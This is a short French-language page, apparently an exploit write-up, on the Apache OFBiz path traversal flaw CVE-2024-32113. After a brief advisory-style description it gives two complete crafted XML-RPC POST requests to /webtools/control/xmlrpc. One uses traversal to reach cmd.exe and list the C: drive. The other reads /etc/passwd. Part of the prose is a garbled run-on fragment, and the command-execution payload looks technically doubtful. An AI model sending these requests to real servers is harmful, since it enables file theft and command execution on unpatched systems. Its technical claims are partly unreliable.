
Exploit pour la vulnérabilité de traversée de chemin Apache OFBiz CVE-2024-32113 via des requêtes XML-RPC forgées, permettant la lecture arbitraire de fichiers et l'exécution potentielle de commandes sur les serveurs vulnérables.
Une vulnérabilité classée comme critique a été trouvée dans Apache OFBiz jusqu'à la version 18.12.12. Cette faille affecte une fonctionnalité inconnue. La manipulation d'une entrée inconnue conduit à une vulnérabilité de traversée de chemin. Le produit utilise une entrée externe pour construire un chemin d'accès destiné à identifier un fichier ou un répertoire situé sous un répertoire parent restreint, mais le produit ne neutralise pas correctement les éléments spéciaux dans le chemin qui peuvent amener le chemin à résoudre vers un emplacement en dehors du répertoire restreint. Sont impactés la confidentialité, l'intégrité et la disponibilité.
../../../../../../etc/passwd pour pointer vers le fichier etc/passwd sur le serveur Apache OFBiz.etc/passwd, qui contient des informations sensibles sur les utilisateurs du serveur.POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>